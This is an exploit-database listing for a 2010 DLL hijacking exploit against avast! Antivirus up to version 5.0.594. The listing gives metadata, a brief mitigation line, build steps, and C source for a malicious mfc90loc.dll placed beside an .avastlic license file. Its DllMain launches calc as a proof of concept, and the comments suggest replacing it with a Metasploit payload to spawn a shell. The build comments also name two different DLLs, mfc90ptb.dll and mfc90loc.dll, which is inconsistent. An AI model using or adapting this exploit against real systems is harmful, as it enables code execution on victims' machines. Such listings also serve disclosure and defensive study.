header-logo
Suggest Exploit
vendor:
Avast Antivirus
by:
Bruno Filipe
7,8
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Avast Antivirus
Affected Version From: <= 5.0.594
Affected Version To: <= 5.0.594
Patch Exists: NO
Related CWE: N/A
CPE: avast
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP SP2, WinXP SP3
2010

avast! license files DLL Hijacking Exploit (mfc90loc.dll)

This exploit works with avast license files (.avastlic). The attacker can generate a msfpayload DLL and spawn a shell. The exploit is based on the DLL mfc90loc.dll which is put in the same directory of an avast license file.

Mitigation:

Ensure that all DLLs are from trusted sources and are properly signed.
Source

Exploit-DB raw data:

/*
# Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.avast.com
# Version: <= 5.0.594
# Tested on: WinXP SP2, WinXP SP3
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with avast license files (.avastlic)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
anything.avastlic)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------
*/

#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}